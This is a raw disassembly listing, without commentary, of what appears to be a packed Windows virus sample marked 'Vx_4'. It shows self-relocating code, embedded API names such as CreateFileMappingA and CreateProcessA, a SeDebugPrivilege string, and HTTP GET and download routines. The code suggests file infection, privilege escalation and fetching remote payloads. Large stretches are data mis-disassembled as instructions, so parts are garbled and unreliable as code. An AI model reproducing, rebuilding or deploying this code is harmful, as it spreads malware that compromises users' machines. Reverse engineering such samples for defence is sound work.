mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151B282
loc_3151B638: ; CODE XREF: sub_3151B282+1F�j
; sub_3151B282+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_3151B1F4
; END OF FUNCTION CHUNK FOR sub_3151B282
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3151B644 proc near ; CODE XREF: UPX2:loc_3151B487�p
; sub_3151B663+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_3151B644 endp
; ---------------------------------------------------------------------------
aVx_4_1 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3151B663 proc near ; CODE XREF: sub_3151B282+9�p
xor ecx, ecx
call sub_3151B644
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3151B663 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3151B6A0 proc near ; CODE XREF: sub_3151B282+7C�p
; UPX2:3151B416�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3151B6AB: ; CODE XREF: sub_3151B6A0+E�j
lodsb
test al, al
jnz short loc_3151B6AB
loop sub_3151B6A0
retn
sub_3151B6A0 endp
; =============== S U B R O U T I N E =======================================
sub_3151B6B3 proc near ; CODE XREF: sub_3151D231+25�p
; FUNCTION CHUNK AT 3151B73D SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 3151BB0D SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_3151B6E0+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_3151B73D
jbe short near ptr loc_3151B73D+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_3151B744
inc ecx
loc_3151B6E0: ; CODE XREF: sub_3151B6B3+13�p
add [eax-1], dl
sub_3151B6B3 endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151B6B3
loc_3151B73D: ; CODE XREF: sub_3151B6B3+1F�j
; sub_3151B6B3+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3151B7A7+2
loc_3151B744: ; CODE XREF: sub_3151B6B3+2A�j
push edx
db 65h
insd
outsd
jz short loc_3151B7AF
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3151B7BA+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3151B7C6+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_3151B7E5+1
push 4500746Fh
js short loc_3151B7E3
jz short near ptr loc_3151B7CF+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_3151B804
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_3151B7E7+6
loc_3151B7A7: ; CODE XREF: sub_3151B6B3+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3151B7AF: ; CODE XREF: sub_3151B6B3+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_3151B7F6
add [edi+65h], al
jz short near ptr loc_3151B7FF+1
loc_3151B7BA: ; CODE XREF: sub_3151B6B3+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_3151B80C
loc_3151B7C6: ; CODE XREF: sub_3151B6B3+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3151B7CF: ; CODE XREF: sub_3151B6B3+C7�j
db 65h
jz short near ptr loc_3151B81E+1
outsd
db 64h
jnz short near ptr loc_3151B83D+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3151B831+6
loc_3151B7E3: ; CODE XREF: sub_3151B6B3+C5�j
db 65h
insd
loc_3151B7E5: ; CODE XREF: sub_3151B6B3+BE�j
jo short near ptr loc_3151B82B+2
loc_3151B7E7: ; CODE XREF: sub_3151B6B3+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_3151B845+3
db 65h
insd
loc_3151B7F6: ; CODE XREF: sub_3151B6B3+FF�j
jo short near ptr loc_3151B845+3
popa
jz short near ptr loc_3151B862+1
inc ecx
add [edi+65h], al
loc_3151B7FF: ; CODE XREF: sub_3151B6B3+105�j
jz short loc_3151B857
db 65h
jb short near ptr loc_3151B876+1
loc_3151B804: ; CODE XREF: sub_3151B6B3+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_3151B80C: ; CODE XREF: sub_3151B6B3+110�j
db 65h
jb short near ptr loc_3151B880+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3151B86F+1
outsd
insb
jnz short near ptr loc_3151B885+6
loc_3151B81E: ; CODE XREF: sub_3151B6B3:loc_3151B7CF�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3151B890+2
popa
jz short near ptr loc_3151B890+1
outsd
outsb
inc ecx
loc_3151B82B: ; CODE XREF: sub_3151B6B3:loc_3151B7E5�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3151B831: ; CODE XREF: sub_3151B6B3+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3151B893
loc_3151B83D: ; CODE XREF: sub_3151B6B3+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_3151B845: ; CODE XREF: sub_3151B6B3+13F�j
; sub_3151B6B3:loc_3151B7F6�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_3151B857: ; CODE XREF: sub_3151B6B3:loc_3151B7FF�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_3151B8CD+1
arpl [ebp+73h], sp
loc_3151B862: ; CODE XREF: sub_3151B6B3+146�j
jnb short $+2
push eax
jb short loc_3151B8D6
arpl [ebp+73h], sp
jnb short near ptr loc_3151B898+7
xor al, [esi+69h]
loc_3151B86F: ; CODE XREF: sub_3151B6B3+164�j
jb short near ptr loc_3151B8DE+6
jz short $+2
push eax
jb short near ptr loc_3151B8DE+7
loc_3151B876: ; CODE XREF: sub_3151B6B3+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_3151B8AD+1
xor cl, [esi+65h]
js short near ptr loc_3151B8F0+4
loc_3151B880: ; CODE XREF: sub_3151B6B3:loc_3151B80C�j
add [ebx+65h], dl
jz short near ptr loc_3151B8C9+2
loc_3151B885: ; CODE XREF: sub_3151B6B3+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3151B890: ; CODE XREF: sub_3151B6B3+173�j
; sub_3151B6B3+170�j
db 65h
jnb short loc_3151B8D4
loc_3151B893: ; CODE XREF: sub_3151B6B3+188�j
add [ebx+65h], dl
jz short loc_3151B8DE
loc_3151B898: ; CODE XREF: sub_3151B6B3+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_3151B91C
jz short loc_3151B910
insd
push esp
loc_3151B8AD: ; CODE XREF: sub_3151B6B3+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_3151B917
imul esp, [ebp+77h], 6946664Fh
insb
loc_3151B8C9: ; CODE XREF: sub_3151B6B3+1D0�j
add gs:[esi+69h], dl
loc_3151B8CD: ; CODE XREF: sub_3151B6B3+1AA�j
jb short near ptr loc_3151B942+1
jnz short loc_3151B932
insb
inc ecx
insb
loc_3151B8D4: ; CODE XREF: sub_3151B6B3:loc_3151B890�j
insb
outsd
loc_3151B8D6: ; CODE XREF: sub_3151B6B3+1B2�j
arpl [eax], ax
push edi
jb short loc_3151B944
jz short loc_3151B942
inc esi
loc_3151B8DE: ; CODE XREF: sub_3151B6B3+1E3�j
; sub_3151B6B3:loc_3151B86F�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3151B95E
push eax
jb short near ptr loc_3151B953+3
jbe short near ptr loc_3151B953+5
insb
loc_3151B8F0: ; CODE XREF: sub_3151B6B3+1CB�j
db 65h, 67h, 65h
jnb near ptr 0B949h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3151B93F+1
jb short near ptr loc_3151B963+1
popa
jz short loc_3151B967
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_3151B974
push eax
loc_3151B910: ; CODE XREF: sub_3151B6B3+1F6�j
jb short loc_3151B981
arpl [ebp+73h], sp
jnb short $+2
loc_3151B917: ; CODE XREF: sub_3151B6B3+20C�j
dec esi
jz short near ptr loc_3151B95A+3
jb short loc_3151B981
loc_3151B91C: ; CODE XREF: sub_3151B6B3+1F4�j
popa
jz short loc_3151B984
push eax
jb short loc_3151B991
arpl [ebp+73h], sp
jnb short near ptr loc_3151B967+5
js short $+2
dec esi
jz short loc_3151B96F
jb short loc_3151B993
popa
jz short near ptr loc_3151B993+3
push ebx
loc_3151B932: ; CODE XREF: sub_3151B6B3+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3151B9A2+1
popa
loc_3151B93F: ; CODE XREF: sub_3151B6B3+248�j
jz short loc_3151B9A6
push ebp
loc_3151B942: ; CODE XREF: sub_3151B6B3+228�j
; sub_3151B6B3:loc_3151B8CD�j
jnb short near ptr loc_3151B9A8+1
loc_3151B944: ; CODE XREF: sub_3151B6B3+226�j
jb short near ptr loc_3151B993+3
jb short loc_3151B9B7
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_3151B99D
popa
jo short near ptr loc_3151B9A8+1
loc_3151B953: ; CODE XREF: sub_3151B6B3+238�j
; sub_3151B6B3+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_3151B95A: ; CODE XREF: sub_3151B6B3+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3151B95E: ; CODE XREF: sub_3151B6B3+235�j
outsb
add [esi+74h], cl
dec edi
loc_3151B963: ; CODE XREF: sub_3151B6B3+24A�j
jo short loc_3151B9CA
outsb
inc esi
loc_3151B967: ; CODE XREF: sub_3151B6B3+24D�j
; sub_3151B6B3+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3151B96F: ; CODE XREF: sub_3151B6B3+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3151B9E3
loc_3151B974: ; CODE XREF: sub_3151B6B3+25A�j
arpl [ebp+73h], sp
jnb short loc_3151B9CD
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3151B9CF+1
loc_3151B981: ; CODE XREF: sub_3151B6B3:loc_3151B910�j
; sub_3151B6B3+267�j
jo short near ptr loc_3151B9E7+1
outsb
loc_3151B984: ; CODE XREF: sub_3151B6B3+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3151B9FF+1
loc_3151B991: ; CODE XREF: sub_3151B6B3+26D�j
jz short near ptr loc_3151B9F7+1
loc_3151B993: ; CODE XREF: sub_3151B6B3+279�j
; sub_3151B6B3+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_3151BA0D
jnz short near ptr loc_3151B9FB+1
insb
dec ebp
loc_3151B99D: ; CODE XREF: sub_3151B6B3+29B�j
db 65h
insd
outsd
jb short near ptr loc_3151BA18+3
loc_3151B9A2: ; CODE XREF: sub_3151B6B3+289�j
add [esi+74h], cl
push ecx
loc_3151B9A6: ; CODE XREF: sub_3151B6B3:loc_3151B93F�j
jnz short loc_3151BA0D
loc_3151B9A8: ; CODE XREF: sub_3151B6B3:loc_3151B942�j
; sub_3151B6B3+29E�j
jb short near ptr loc_3151BA22+1
dec ecx
outsb
outsw
jb short near ptr loc_3151BA1C+1
popa
jz short loc_3151BA1C
outsd
outsb
push esp
outsd
loc_3151B9B7: ; CODE XREF: sub_3151B6B3+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3151BA13+2
jb short loc_3151BA29
jz short near ptr loc_3151BA26+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_3151B9CA: ; CODE XREF: sub_3151B6B3:loc_3151B963�j
db 65h
insd
outsd
loc_3151B9CD: ; CODE XREF: sub_3151B6B3+2C4�j
jb short loc_3151BA48
loc_3151B9CF: ; CODE XREF: sub_3151B6B3+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_3151BA45+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3151B9E3: ; CODE XREF: sub_3151B6B3+2BF�j
outsb
jnb short near ptr loc_3151BA4E+1
push ebx
loc_3151B9E7: ; CODE XREF: sub_3151B6B3:loc_3151B981�j
jz short loc_3151BA5B
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_3151BA54
jb short loc_3151BA69
jnz short near ptr loc_3151BA66+1
loc_3151B9F7: ; CODE XREF: sub_3151B6B3:loc_3151B991�j
add [ebx+6Ch], ah
outsd
loc_3151B9FB: ; CODE XREF: sub_3151B6B3+2E6�j
jnb short loc_3151BA62
jnb short near ptr loc_3151BA6D+1
loc_3151B9FF: ; CODE XREF: sub_3151B6B3+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_3151BA0D: ; CODE XREF: sub_3151B6B3+2E4�j
; sub_3151B6B3:loc_3151B9A6�j
db 65h
jz short near ptr loc_3151BA77+1
outsd
jnb short near ptr loc_3151BA85+2
loc_3151BA13: ; CODE XREF: sub_3151B6B3+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_3151BA18: ; CODE XREF: sub_3151B6B3+2ED�j
add gs:[edx+65h], dh
loc_3151BA1C: ; CODE XREF: sub_3151B6B3+2FE�j
; sub_3151B6B3+2FB�j
arpl [esi+0], si
jnb short near ptr loc_3151BA85+1
outsb
loc_3151BA22: ; CODE XREF: sub_3151B6B3:loc_3151B9A8�j
add fs:[ebx+6Fh], dh
loc_3151BA26: ; CODE XREF: sub_3151B6B3+30D�j
arpl [ebx+65h], bp
loc_3151BA29: ; CODE XREF: sub_3151B6B3+30B�j
jz short $+2
dec ecx
outsb
jz short loc_3151BA94
jb short loc_3151BA9F
db 65h
jz short loc_3151BA77
insb
outsd
jnb short near ptr loc_3151BA9C+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_3151BAA8
jb short near ptr loc_3151BAB2+1
loc_3151BA45: ; CODE XREF: sub_3151B6B3+329�j
db 65h
jz short loc_3151BA8F
loc_3151BA48: ; CODE XREF: sub_3151B6B3:loc_3151B9CD�j
db 65h
jz short loc_3151BA8E
outsd
outsb
outsb
loc_3151BA4E: ; CODE XREF: sub_3151B6B3+331�j
arpl gs:[ebp+64h], si
push ebx
loc_3151BA54: ; CODE XREF: sub_3151B6B3+33E�j
jz short near ptr loc_3151BAB6+1
jz short loc_3151BABD
add [ecx+6Eh], cl
loc_3151BA5B: ; CODE XREF: sub_3151B6B3:loc_3151B9E7�j
jz short near ptr loc_3151BAC0+2
jb short loc_3151BACD
db 65h
jz short near ptr loc_3151BAAF+2
loc_3151BA62: ; CODE XREF: sub_3151B6B3:loc_3151B9FB�j
jo short loc_3151BAC9
outsb
inc ecx
loc_3151BA66: ; CODE XREF: sub_3151B6B3+342�j
add [ecx+6Eh], cl
loc_3151BA69: ; CODE XREF: sub_3151B6B3+340�j
jz short near ptr loc_3151BACF+1
jb short loc_3151BADB
loc_3151BA6D: ; CODE XREF: sub_3151B6B3+34A�j
db 65h
jz short near ptr loc_3151BABE+1
jo short loc_3151BAD7
outsb
push ebp
jb short near ptr loc_3151BAE0+2
inc ecx
loc_3151BA77: ; CODE XREF: sub_3151B6B3+37E�j
; sub_3151B6B3:loc_3151BA0D�j
add [ecx+6Eh], cl
jz short near ptr loc_3151BAE0+1
jb short loc_3151BAEC
db 65h
jz short near ptr loc_3151BAD2+1
db 65h
popa
db 64h
inc esi
loc_3151BA85: ; CODE XREF: sub_3151B6B3+36C�j
; sub_3151B6B3+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3151BA8E: ; CODE XREF: sub_3151B6B3:loc_3151BA48�j
dec ecx
loc_3151BA8F: ; CODE XREF: sub_3151B6B3:loc_3151BA45�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_3151BA94: ; CODE XREF: sub_3151B6B3+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_3151BA9C: ; CODE XREF: sub_3151B6B3+383�j
jnb short near ptr loc_3151BB01+2
dec ebx
loc_3151BA9F: ; CODE XREF: sub_3151B6B3+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_3151BB0D
loc_3151BAA8: ; CODE XREF: sub_3151B6B3+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_3151BAF0+2
js short loc_3151BAF0
loc_3151BAAF: ; CODE XREF: sub_3151B6B3+3AC�j
add [edx+65h], dl
loc_3151BAB2: ; CODE XREF: sub_3151B6B3+390�j
db 67h
push ecx
jnz short loc_3151BB1B
loc_3151BAB6: ; CODE XREF: sub_3151B6B3:loc_3151BA54�j
jb short near ptr loc_3151BB30+1
push esi
popa
insb
jnz short near ptr loc_3151BB21+1
loc_3151BABD: ; CODE XREF: sub_3151B6B3+3A3�j
inc ebp
loc_3151BABE: ; CODE XREF: sub_3151B6B3:loc_3151BA6D�j
js short loc_3151BB01
loc_3151BAC0: ; CODE XREF: sub_3151B6B3:loc_3151BA5B�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_3151BB1E
popa
loc_3151BAC9: ; CODE XREF: sub_3151B6B3:loc_3151BA62�j
insb
jnz short near ptr loc_3151BB30+1
inc ebp
loc_3151BACD: ; CODE XREF: sub_3151B6B3+3AA�j
js short loc_3151BB10
loc_3151BACF: ; CODE XREF: sub_3151B6B3:loc_3151BA69�j
add [esi+33h], dl
loc_3151BAD2: ; CODE XREF: sub_3151B6B3+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_3151BAD7: ; CODE XREF: sub_3151B6B3+3BD�j
mov edx, esp
push 1
loc_3151BADB: ; CODE XREF: sub_3151B6B3+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_3151BAE0: ; CODE XREF: sub_3151B6B3+3C7�j
; sub_3151B6B3+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_3151BAEC: ; CODE XREF: sub_3151B6B3+3C9�j
push esi
push dword ptr [eax+18h]
loc_3151BAF0: ; CODE XREF: sub_3151B6B3+3FA�j
; sub_3151B6B3+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3151B6B3
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_3151BB01: ; CODE XREF: sub_3151B6B3:loc_3151BABE�j
; sub_3151B6B3:loc_3151BA9C�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151B6B3
loc_3151BB0D: ; CODE XREF: sub_3151B6B3+3F3�j
add [edx+5], ch
loc_3151BB10: ; CODE XREF: sub_3151B6B3:loc_3151BACD�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_3151BB1B: ; CODE XREF: sub_3151B6B3+401�j
push esp
push 40h
loc_3151BB1E: ; CODE XREF: sub_3151B6B3+412�j
push ecx
push edx
push ebx
loc_3151BB21: ; CODE XREF: sub_3151B6B3+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_3151BB30: ; CODE XREF: sub_3151B6B3:loc_3151BAB6�j
; sub_3151B6B3+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3151B6B3
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
